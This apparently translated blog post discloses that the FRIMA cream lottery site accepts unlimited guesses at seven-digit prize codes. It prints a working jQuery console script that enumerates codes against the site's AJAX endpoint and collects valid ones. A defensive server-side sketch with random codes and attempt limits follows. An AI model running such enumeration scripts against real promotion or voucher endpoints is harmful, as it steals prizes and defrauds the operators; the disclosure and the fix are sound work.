The scandals around MTS and Nestea and around eBay and Biglion have only recently died down, and developers still do not learn from the mistakes of others. This time, FRIMA distinguished itself with its dry cream.
Tonight I opened a pack of cream and noticed there was a little round bucket with a code. I usually do not participate in such events, but my attention was caught by a small detail: the "winning code" looked like this: FRIMA1234123. As many readers will have noticed, the code consists essentially of seven decimal digits, that is, we have a total of 10,000,000 combinations.
The first thing that occurred to me was to go to the site where the code is entered, frima.biz/lottery, where it turned out that no captcha was used to check the code. A quick inspection of the AJAX verification request showed that the response is a JSON object with a code field, which is 0 if the code exists.
Following this, I opened the browser console and entered the following code:
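t = [];      // numbers the server reported as existing codes
i = 1111111; // first number to check
q = function() {
    jQuery.post('/lottery?task=ajax&action=checkTicketNumber', {
        spoof_id: 1,
        frmname: '',
        frmemail: '',
        'extra_field[1]': '',
        'extra_field[2]': '',
        ticket_number: 'FRIMA' + i
    }, function(res) {
        // code == 0 in the JSON response means the ticket number exists
        if (JSON.parse(res).code == 0) {
            t.push(i);
        }
        // move on to the next number until the upper bound is reached
        if (i < 1112222) {
            i++;
            q();
        }
    });
};
q();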
After that, we can get the accumulated list of codes at any time by running
console.log(t);
It is easy to see from the code that we simply check all possible codes starting from 1111111. Having received about a dozen codes in a minute, I satisfied my ego and decided to write here.
As a result, I condemn the TopWebDesign company, which proudly signed itself in the footer of the site under review as the developer of this hack.
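For contrast, a server-side sketch of the two controls the post found missing: codes drawn from a space far larger than 10,000,000, and a cap on failed checks per client so the endpoint stops acting as a free yes/no oracle. This is an added example for Node.js, not the site's or its developer's code; every name and limit in it (generateCode, AttemptLimiter, checkTicket, 12 symbols) is an assumption.

```javascript
// Added example: all names and limits are assumptions, not the site's real code.
const crypto = require('crypto');

const ALPHABET = 'ABCDEFGHJKLMNPQRSTUVWXYZ23456789'; // 32 symbols, no look-alikes
const CODE_LEN = 12;                                  // 32^12 = 2^60 possible codes

// Draw each symbol from the OS CSPRNG; randomInt avoids modulo bias.
function generateCode() {
  let code = '';
  for (let n = 0; n < CODE_LEN; n++) code += ALPHABET[crypto.randomInt(ALPHABET.length)];
  return code;
}

// Sliding-window counter of failed checks per client key (IP, session, account).
class AttemptLimiter {
  constructor(maxFailures, windowMs) {
    this.maxFailures = maxFailures;
    this.windowMs = windowMs;
    this.failures = new Map(); // clientKey -> timestamps of recent failures
  }
  // Drop timestamps older than the window and return the stored, pruned list.
  recent(clientKey, now) {
    const kept = (this.failures.get(clientKey) || []).filter(t => now - t < this.windowMs);
    this.failures.set(clientKey, kept);
    return kept;
  }
  blocked(clientKey, now) { return this.recent(clientKey, now).length >= this.maxFailures; }
  recordFailure(clientKey, now) { this.recent(clientKey, now).push(now); }
}

// Returns 'blocked', 'invalid' or 'valid'. A blocked client gets no answer
// about the code at all, so further guesses yield no information.
function checkTicket(issuedCodes, limiter, clientKey, submitted, now = Date.now()) {
  if (limiter.blocked(clientKey, now)) return 'blocked';
  if (!issuedCodes.has(String(submitted).toUpperCase())) {
    limiter.recordFailure(clientKey, now);
    return 'invalid';
  }
  return 'valid';
}
```

With only ten million possible values even a strict limiter merely slows enumeration spread across many clients, which is why the larger code space matters as much as the attempt cap.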